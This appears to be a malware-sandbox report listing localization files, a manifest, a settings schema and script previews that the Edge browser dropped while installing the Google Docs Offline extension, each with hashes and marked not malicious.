                                                                                                                                                            SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                            MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                            SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                            SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                            SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1969
                                                                                                                                                            Entropy (8bit):4.327258153043599
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                            MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                            SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                            SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                            SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1674
                                                                                                                                                            Entropy (8bit):4.343724179386811
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                            MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                            SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                            SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                            SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1063
                                                                                                                                                            Entropy (8bit):4.853399816115876
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                            MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                            SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                            SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                            SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1333
                                                                                                                                                            Entropy (8bit):4.686760246306605
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                            MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                            SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                            SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                            SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1263
                                                                                                                                                            Entropy (8bit):4.861856182762435
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                            MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                            SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                            SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                            SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1074
                                                                                                                                                            Entropy (8bit):5.062722522759407
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                            MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                            SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                            SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                            SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):879
                                                                                                                                                            Entropy (8bit):5.7905809868505544
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                            MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                            SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                            SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                            SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1205
                                                                                                                                                            Entropy (8bit):4.50367724745418
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                            MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                            SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                            SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                            SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):843
                                                                                                                                                            Entropy (8bit):5.76581227215314
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                            MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                            SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                            SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                            SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):912
                                                                                                                                                            Entropy (8bit):4.65963951143349
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                            MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                            SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                            SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                            SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):11406
                                                                                                                                                            Entropy (8bit):5.745845607168024
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                            MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                            SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                            SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                            SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):854
                                                                                                                                                            Entropy (8bit):4.284628987131403
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                            MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                            SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                            SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                            SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\manifest.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2525
                                                                                                                                                            Entropy (8bit):5.417954053901
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                            MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                            SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                            SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                            SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\offscreendocument.html

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):97
                                                                                                                                                            Entropy (8bit):4.862433271815736
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                            MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                            SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                            SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                            SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (4882)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):122218
                                                                                                                                                            Entropy (8bit):5.439997574414675
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                            MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                            SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                            SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                            SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

